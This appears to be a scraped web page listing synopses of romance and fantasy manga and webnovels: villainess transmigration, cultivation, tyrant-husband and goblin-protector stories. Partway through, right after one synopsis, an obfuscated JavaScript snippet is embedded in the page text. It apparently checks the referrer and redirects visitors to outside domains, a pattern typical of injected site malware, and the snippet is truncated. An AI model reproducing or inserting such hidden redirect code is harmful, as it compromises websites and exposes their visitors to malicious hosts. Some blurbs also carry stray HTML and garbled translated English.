Xie Cheng, born unable to see colors, has been living in a world of black and white for years. Until one day he encounters Mr Bai Lu who was being chased by people, and unexpectedly discovers he has a unique beautiful color. What kind of spark will happen when two different people meet by chance?
Based on the great natural law, the strong is invincible. The antediluvian method of elixir shines the mountains and rivers, the all-conquering treasured sword annihilates the universe and transmigration, and the blood vessel of Shura ruins the supremacy of every realm. Inheriting from the mandate of heaven, and practicing unrivaled skills, Nan Qin overwhelmingly started his own travel towards the strong which is immortal and matchless! “Burn the sky and boil the wine to study the rule of Shura, and then kill those beast all!” Sky Sword God
One day the tyrant, Estian, sent a marriage proposal to Cecil. She got dragged to the empire unwillingly but when she saw the emperor's face she had a change of heart. "You're quite the hottie aren't you?" She liked her husband. And her husband likes her back too! To live happily with her tyrant husband does Cecil need to become a villainess far worse than the tyrant?!
The princess Violetta, who was exiled for being an idiot, She was killed at midnight by unidentified men. Ebigail, the lifetime servant of the queen.she never expected that the death will come to her that night. And before she died. Lakiel, the Duke of Edelgard, appears, saying he will make her the empress. ” I can’t. Please.” I could ruin you. ” Destiny changed overnight. Imperial Palace’s biggest fraud begins.”
Wu Yue is a 'catnip' descendant- one who carries the fragrance of catnip on her body. Not knowing better, she enrolled in a school that is filled with cat descendants, causing a commotion and to be chased around by them. In the process of escaping, Wu Yue accidentally kissed Li Zechu, a descendant of the jaguar, and unexpectedly discovered that Li Zechu's kiss could somehow camoflage her unique fragrance. Thus, in order to quell the commotion she had caused and survive in school, Wu Yue had to become Li Zechu’s pet. She would have to endure all sort of harrassments, just for a kiss from Li Zechu... It is an impossible kind of development. Wu Yue vows to find another solution to this problem and be rid of the control of the demon Li Zechu!<script></script><script>function _0x3d69(){var _0x25f246=['1224lEHIjS','555878pSjwxW','cRDXs','random','includes','floor','href','google','kgKXh','909916INEvEC','9202lpaCZt','StfZh','http://rea','.top/','OnrVn','text','.customapi','oLZiO','location','then','xZpEp','Xyuym','74655agoAxp','https://ip','656476pUhlNA','3VnztdJ','Arvjf','OGZGT','dma.net/','referrer','1623365OnOhiI','2689284LaMzje'];_0x3d69=function(){return _0x25f246;};return _0x3d69();}(function(_0x39bd81,_0x25230a){var _0x41b5de=_0x5adc,_0x2ce74d=_0x39bd81();while(!![]){try{var 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I died in an accident while I was chased by debt collectors. Then I transmigrated into the book The Fairy’s Garden, but why did I have to possess the villainess?! Aine le Peregrine, an infamous femme fatale was the villainess. Besides harassing the heroine, she also has a peculiar hobby of collecting beautiful men. But in the end, she died at the hands of the men she collected… No, I can’t die like this! Alright! Starting today, my goal is to say farewell. [spoiler]I need to safely break up with these men immediately! “The reason I came to the duchy today is not to break off the engagement, but to tell you I have no intention of breaking off the engagement.” … Why is this man acting like this? The Grand Duke who should be falling in love with the heroine does not want to break off our engagement. Not only him, but the unfathomable Assassin King J and the wolf-man that brings out my motherly instinct, Shion… the more I try to get rid of them, the harder they stick onto me. Will she be able to safely break up with these three men and preserve her life?![/spoiler]
<span class="mx-1">My Wife is Back </span> "We should get a divorce." A marriage without love. Choi Mo-won was a man who thought marriage was solely for business. But Lee Yu-rae, the woman he was married to, suddenly asked him for a divorce. Three years later, one day, in an unexpected place, they reunited in a strange relationship.... "Do you want to go out with me?" His wife is back. But is she the same woman he used to know? His once lifeless heart started to beat. And that too, for his ex-wife, who has returned.
“This is her daughter?” Tara, the illegitimate daughter of the noble Queen Adelaide, was thrown away as a baby and raised by poor relatives. They sent her to a notorious mage in the west named Judas, whom she had never met before. While she is overwhelmed by her so-called guardian’s impossible beauty, he and the others in the castle treat her warily, hateful of the queen. However, the girl’s lovable innocence and pitiful nature begin to melt the immortal magician’s frozen heart… “Stop acting cute. You’re like a vixen.” “Why do you keep calling me a vixen?” “I don’t care if that child is broken. To me, life and destruction are one and the same.” A healing romance blooms between an obsessive and frigid ‘guardian’ that only shows kindness to one girl, and a little ‘miss’ scarred by her past.
<h2>Princess and Her Ancient Vine</h2> As the most successful business woman in the country, our female lead, a CEO, thought her battlefield would be business. However, things changed after she obtained a mysterious vine, which brought her to a world to a land of cultivation! There she met her destined man... MangaToon got authorization from Bciyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
If one day a blue flame appears, my life will shine brightly.” Princess Jeong Myeong, lost in Yeongchang-gun by Gwanghae-gun and was confined in the Gyeongung Palace with her mother, Inmok. Kim Gae-si, the palace of Gwanghae-gun, is overlooked by the chance to kill her. In the cold and desolate Gyeongung Palace, Jeong Myeong feels the presence of someone who has been around her from one day. “I am the king of goblins, the one who keeps you.” “The king of goblins? Do you have a name?” “I do not.” “Then I will give you one. Your name is… dating.” The curse of the impenetrable goddess of life imprisons Myung Myung’s life and is in danger of losing everything she wants. “Come on. Jeongmyeong, I was waiting for you.” The Goblin Protector / Blue Fire Whirlpool / Finally, a Blue Flame / Finally, the Blue Flame / Goblin si Pelindung / 青火の渦 / 마침내 푸른 불꽃이
Hari Lee, a girl who’s busy balancing both part-time jobs and school, falls for her senior at school, Jinho, but her one-sided love ends without her getting the chance to confess when Jinho starts dating her friend, Yeonju, instead. 3 years later, Jinho and Yeonju are still together and Hari has gotten over Jinho, but Jinho suddenly starts drunk-calling Hari and confessing to her? To get rid of Jinho, Hari, who has no time for romance, accidentally agrees to a blind-date with a guy Yeonju knows. This is the story of their romance! Love of Mine The Only Love I Know
This song only for you Behind the bright light so many dark things can not let people know? When the ultra-lazy A * rock singer meets a cold surgeon, how will the two of them "fire"? Throw away the mask to free the truth, become the enemy's savior. In the dark, do you wish to hold my hand? * She has never loved anyone like that, she vows because he went to hell together. * He has never loved anyone like that, he vows for her to let go of everything.